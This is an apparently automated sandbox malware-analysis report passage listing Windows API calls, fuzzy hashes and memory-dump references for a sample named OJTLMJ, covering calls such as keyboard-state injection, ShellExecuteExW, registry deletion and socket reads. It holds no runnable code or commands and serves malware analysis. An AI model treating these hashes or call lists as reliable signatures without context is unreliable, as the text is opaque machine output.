                                                                                                                  • Part of subcall function 00D68A0C: __malloc_crt.LIBCMT ref: 00D68A48
                                                                                                                • __lock.LIBCMT ref: 00D6B757
                                                                                                                • __lock.LIBCMT ref: 00D6B7A3
                                                                                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00DF6948,00000018,00D76C2B,?,00000000,00000109), ref: 00D6B7BF
                                                                                                                • EnterCriticalSection.KERNEL32(8000000C,00DF6948,00000018,00D76C2B,?,00000000,00000109), ref: 00D6B7DC
                                                                                                                • LeaveCriticalSection.KERNEL32(8000000C), ref: 00D6B7EC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                                                                • String ID:
                                                                                                                • API String ID: 1422805418-0
                                                                                                                • Opcode ID: b8c0498d49935352fcdaeba42c69c82113857f3898b698e22cc92349afc500e9
                                                                                                                • Instruction ID: 2ffe91d4aff7b6e614aeb4a6a1deca10767343acc402eadadad0c3db615fa7d0
                                                                                                                • Opcode Fuzzy Hash: b8c0498d49935352fcdaeba42c69c82113857f3898b698e22cc92349afc500e9
                                                                                                                • Instruction Fuzzy Hash: 94412571D003168BEB109FA8D8447ACBBA8FF81335F14832AE525EB2D1D7749985CBB0
                                                                                                                APIs
                                                                                                                • InterlockedExchange.KERNEL32(?,000001F5), ref: 00D8A1CE
                                                                                                                  • Part of subcall function 00D6010A: std::exception::exception.LIBCMT ref: 00D6013E
                                                                                                                  • Part of subcall function 00D6010A: __CxxThrowException@8.LIBCMT ref: 00D60153
                                                                                                                • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00D8A205
                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 00D8A221
                                                                                                                • _memmove.LIBCMT ref: 00D8A26F
                                                                                                                • _memmove.LIBCMT ref: 00D8A28C
                                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 00D8A29B
                                                                                                                • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00D8A2B0
                                                                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 00D8A2CF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                • String ID:
                                                                                                                • API String ID: 256516436-0
                                                                                                                • Opcode ID: 8a75632fb695fbc5747c1510011ecc66e66e616b94bdd0d73bba07095fc722bb
                                                                                                                • Instruction ID: 3ee4887de75e0d4b2efd0b1ece89e5ce455a071e4049ff31f0c780cef442c619
                                                                                                                • Opcode Fuzzy Hash: 8a75632fb695fbc5747c1510011ecc66e66e616b94bdd0d73bba07095fc722bb
                                                                                                                • Instruction Fuzzy Hash: 5A319031900206EBDF10EF98DC85EAEBBB9EF45310B1480A5F904EB256DB74DA15CB75
                                                                                                                APIs
                                                                                                                • DeleteObject.GDI32(00000000), ref: 00DA8CF3
                                                                                                                • GetDC.USER32(00000000), ref: 00DA8CFB
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00DA8D06
                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 00DA8D12
                                                                                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00DA8D4E
                                                                                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00DA8D5F
                                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00DABB29,?,?,000000FF,00000000,?,000000FF,?), ref: 00DA8D99
                                                                                                                • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00DA8DB9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3864802216-0
                                                                                                                • Opcode ID: dcd6d09fd3dbf64a4c6cb4c4550735f868cc14a640bdd1abfdba76fdbd3f2fa9
                                                                                                                • Instruction ID: f4966e4ac1ceb3298011d8284178ec793662ea06afaf2598c89daa0624b2c976
                                                                                                                • Opcode Fuzzy Hash: dcd6d09fd3dbf64a4c6cb4c4550735f868cc14a640bdd1abfdba76fdbd3f2fa9
                                                                                                                • Instruction Fuzzy Hash: 00317F72141215BFEF108F55CC49FEA3BAAEF4A755F084065FE08DA291CA759C41CB74
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D484A6: __swprintf.LIBCMT ref: 00D484E5
                                                                                                                  • Part of subcall function 00D484A6: __itow.LIBCMT ref: 00D48519
                                                                                                                  • Part of subcall function 00D43BCF: _wcscpy.LIBCMT ref: 00D43BF2
                                                                                                                • _wcstok.LIBCMT ref: 00D91D6E
                                                                                                                • _wcscpy.LIBCMT ref: 00D91DFD
                                                                                                                • _memset.LIBCMT ref: 00D91E30
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                • String ID: X
                                                                                                                • API String ID: 774024439-3081909835
                                                                                                                • Opcode ID: 140a9569424a94e681d80883fbb225b7d101b044670bcbda1a342ccdb739c2b7
                                                                                                                • Instruction ID: f90d0bf27ecf93e5bd3c80598ff136ff82e1c7436b00ab8b01e036df5c95a371
                                                                                                                • Opcode Fuzzy Hash: 140a9569424a94e681d80883fbb225b7d101b044670bcbda1a342ccdb739c2b7
                                                                                                                • Instruction Fuzzy Hash: 99C14C356083419FC754EF28C881A6AB7E4FF85350F04492DF99A972A2DB70ED45CBB2
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00D5AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00D5AF8E
                                                                                                                • GetSystemMetrics.USER32(0000000F), ref: 00DAFFCB
                                                                                                                • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 00DB01EB
                                                                                                                • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00DB0209
                                                                                                                • InvalidateRect.USER32(?,00000000,00000001,?), ref: 00DB0234
                                                                                                                • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00DB025D
                                                                                                                • ShowWindow.USER32(00000003,00000000), ref: 00DB027F
                                                                                                                • DefDlgProcW.USER32(?,00000005,?,?), ref: 00DB029E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                                                                                                • String ID:
                                                                                                                • API String ID: 3356174886-0
                                                                                                                • Opcode ID: f7ca7d5e3115fd2252b9398b1ac9dc434fc1639c247450f52abf1ddad47e6d49
                                                                                                                • Instruction ID: 1d0ff2402c2df0af57af86fa2a72c1fabb39addca1c45042b7072f274b6bddbb
                                                                                                                • Opcode Fuzzy Hash: f7ca7d5e3115fd2252b9398b1ac9dc434fc1639c247450f52abf1ddad47e6d49
                                                                                                                • Instruction Fuzzy Hash: 73A17D3560061AEFDB18CF68C9857FEBBB1BF08740F188125EC56AB294D734AD55CBA0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 7452bcbaae66b62308d3efb231b980c83017b2402d5adfe5fe0fa86be4985737
                                                                                                                • Instruction ID: 488c24e6fe94afbcdf2a38d8a5a5e2eec218e18c35dfab883eddf2eca6711fbd
                                                                                                                • Opcode Fuzzy Hash: 7452bcbaae66b62308d3efb231b980c83017b2402d5adfe5fe0fa86be4985737
                                                                                                                • Instruction Fuzzy Hash: AA714971900209EFCF14CF98CC88AAEBB75FF85325F24815AFD55AA251D7309A45CB70
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 00DA214B
                                                                                                                • _memset.LIBCMT ref: 00DA2214
                                                                                                                • ShellExecuteExW.SHELL32(?), ref: 00DA2259
                                                                                                                  • Part of subcall function 00D484A6: __swprintf.LIBCMT ref: 00D484E5
                                                                                                                  • Part of subcall function 00D484A6: __itow.LIBCMT ref: 00D48519
                                                                                                                  • Part of subcall function 00D43BCF: _wcscpy.LIBCMT ref: 00D43BF2
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00DA2320
                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00DA232F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                                                                • String ID: @
                                                                                                                • API String ID: 4082843840-2766056989
                                                                                                                • Opcode ID: 5c22598518cd5d7ad447c689786c560a207dc3d74991c06e4d6010bff297d13e
                                                                                                                • Instruction ID: e8e1a298aad7809ba435a67db069aae0777309c58af0bd08dcc5ac1559a3fe47
                                                                                                                • Opcode Fuzzy Hash: 5c22598518cd5d7ad447c689786c560a207dc3d74991c06e4d6010bff297d13e
                                                                                                                • Instruction Fuzzy Hash: 57716D75A006199FCF04EFA9C8859AEB7F5FF49310B148059E855AB351DB34AE40CBB0
                                                                                                                APIs
                                                                                                                • GetParent.USER32(?), ref: 00D8481D
                                                                                                                • GetKeyboardState.USER32(?), ref: 00D84832
                                                                                                                • SetKeyboardState.USER32(?), ref: 00D84893
                                                                                                                • PostMessageW.USER32(?,00000101,00000010,?), ref: 00D848C1
                                                                                                                • PostMessageW.USER32(?,00000101,00000011,?), ref: 00D848E0
                                                                                                                • PostMessageW.USER32(?,00000101,00000012,?), ref: 00D84926
                                                                                                                • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00D84949
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                                                • String ID:
                                                                                                                • API String ID: 87235514-0
                                                                                                                • Opcode ID: cbbb1e4e92bd1b07ace77808ac6e7d019da9800f92f4b681bb33b68cc511d75c
                                                                                                                • Instruction ID: 55a024e029e2f278df04496352f11aba9aef317f6ff4a6c5e24d00422e8ff14f
                                                                                                                • Opcode Fuzzy Hash: cbbb1e4e92bd1b07ace77808ac6e7d019da9800f92f4b681bb33b68cc511d75c
                                                                                                                • Instruction Fuzzy Hash: 6B51C3A06187D73DFB3666248C45BBBBEA95F06304F0C858DE1D9568C2C6E4EC84DB70
                                                                                                                APIs
                                                                                                                • GetParent.USER32(00000000), ref: 00D84638
                                                                                                                • GetKeyboardState.USER32(?), ref: 00D8464D
                                                                                                                • SetKeyboardState.USER32(?), ref: 00D846AE
                                                                                                                • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00D846DA
                                                                                                                • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00D846F7
                                                                                                                • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00D8473B
                                                                                                                • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00D8475C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                                                • String ID:
                                                                                                                • API String ID: 87235514-0
                                                                                                                • Opcode ID: dc8a7ffbd1bf39a764f4e1ac669467e2e8597cc2c9a49fde453b7c7f78e88939
                                                                                                                • Instruction ID: daea222b8f73ffe085272d262f2e8f80ab6864ca5ced008f021ac6d6ccc37a01
                                                                                                                • Opcode Fuzzy Hash: dc8a7ffbd1bf39a764f4e1ac669467e2e8597cc2c9a49fde453b7c7f78e88939
                                                                                                                • Instruction Fuzzy Hash: AB51F7A05047D73DFB36A7248C56BBABF99AB07304F0C8499E1D5468C2E394EC98D770
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcsncpy$LocalTime
                                                                                                                • String ID:
                                                                                                                • API String ID: 2945705084-0
                                                                                                                • Opcode ID: 7dbf0cdf308f793dc651f97d50870021eb477ad9083c4e3d2aca8db17adc234e
                                                                                                                • Instruction ID: e1cbdda5a15d8095b26d52b79f51d46727b5619619e94a1b5ef70535abb3cd22
                                                                                                                • Opcode Fuzzy Hash: 7dbf0cdf308f793dc651f97d50870021eb477ad9083c4e3d2aca8db17adc234e
                                                                                                                • Instruction Fuzzy Hash: 25413F65C106147ACB10EBB4CC8A9DEB7BCEF09350F948866E554F3121EA30E65587B9
                                                                                                                APIs
                                                                                                                • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,00DDDBF0), ref: 00D99409
                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00D99416
                                                                                                                • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00D9943A
                                                                                                                • #16.WSOCK32(?,?,00000000,00000000), ref: 00D99452
                                                                                                                • _strlen.LIBCMT ref: 00D99484
                                                                                                                • _memmove.LIBCMT ref: 00D994CA
                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00D994F7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$_memmove_strlenselect
                                                                                                                • String ID:
                                                                                                                • API String ID: 2795762555-0
                                                                                                                • Opcode ID: 787cba1340aa1ebf3708060eed666d71c168459a86e6eda6047e4fed8d7c662f
                                                                                                                • Instruction ID: 74ab782595e977cf23c8e166730dd96872ebb28dbec18e72c65deb38c223dbca
                                                                                                                • Opcode Fuzzy Hash: 787cba1340aa1ebf3708060eed666d71c168459a86e6eda6047e4fed8d7c662f
                                                                                                                • Instruction Fuzzy Hash: A0418071500205AFCB14EBA8CC95EAEB7B9EF48310F108169F516972D2DB30EE45CB70
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 00DA9DB0
                                                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00DA9E57
                                                                                                                • IsMenu.USER32(?), ref: 00DA9E6F
                                                                                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00DA9EB7
                                                                                                                • DrawMenuBar.USER32 ref: 00DA9ED0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 3866635326-4108050209
                                                                                                                • Opcode ID: 43c0108a34c4078e663d007c2851de8b86086854cfecbc71f7aeb9cc28df3897
                                                                                                                • Instruction ID: e4a91b9bd2bdb4c9028d871481f111c59b53d9fc82c5334eafea32e63f94391a
                                                                                                                • Opcode Fuzzy Hash: 43c0108a34c4078e663d007c2851de8b86086854cfecbc71f7aeb9cc28df3897
                                                                                                                • Instruction Fuzzy Hash: 81413776A01209EFDB20DF60D894E9ABBF5FF06354F088029F945AB251D730EE54CB60
                                                                                                                APIs
                                                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 00DA3C92
                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00DA3CBC
                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00DA3D71
                                                                                                                  • Part of subcall function 00DA3C63: RegCloseKey.ADVAPI32(?), ref: 00DA3CD9
                                                                                                                  • Part of subcall function 00DA3C63: FreeLibrary.KERNEL32(?), ref: 00DA3D2B
                                                                                                                  • Part of subcall function 00DA3C63: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00DA3D4E
                                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00DA3D16
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                                • String ID:
                                                                                                                • API String ID: 395352322-0
                                                                                                                • Opcode ID: 5aad93d7f155fca0ad8d86ca5585ae3cb714ab9b7329810038fc1570cd3f3561
                                                                                                                • Instruction ID: b3a110bdf3742763ca364a5bc43142acf8e9bdee142b5f2afccbc20079d81091
                                                                                                                • Opcode Fuzzy Hash: 5aad93d7f155fca0ad8d86ca5585ae3cb714ab9b7329810038fc1570cd3f3561
                                                                                                                • Instruction Fuzzy Hash: 6631F7B191120ABFDB159B94DC89EFEB7BEEB09300F14056AB512E2150D7709F499B70
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00DA8DF4
                                                                                                                • GetWindowLongW.USER32(013CBF90,000000F0), ref: 00DA8E27
                                                                                                                • GetWindowLongW.USER32(013CBF90,000000F0), ref: 00DA8E5C
                                                                                                                • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00DA8E8E
                                                                                                                • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00DA8EB8
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00DA8EC9
                                                                                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00DA8EE3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.1804505540.0000000000D41000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D40000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.1804478995.0000000000D40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DCD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804589948.0000000000DEE000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804749338.0000000000DFA000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.1804775132.0000000000E04000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_d40000_OJTLMJ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LongWindow$MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 2178440468-0
                                                                                                                • Opcode ID: 0d2f05b075bf99a045e5c4a60e41d7f4a86e84f608e8801aba1ed13b860ac9f4
                                                                                                                • Instruction ID: cf9c2d0de8d8be70e397518fa570a48af314faba6f0dc72fa0b3db285204c300
                                                                                                                • Opcode Fuzzy Hash: 0d2f05b075bf99a045e5c4a60e41d7f4a86e84f608e8801aba1ed13b860ac9f4
                                                                                                                • Instruction Fuzzy Hash: A4312031640216EFDB24CF59DC84F5537A2EB4A314F1841A4F9058F2B2CB72AE80EB60
                                                                                                                APIs
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00D81734
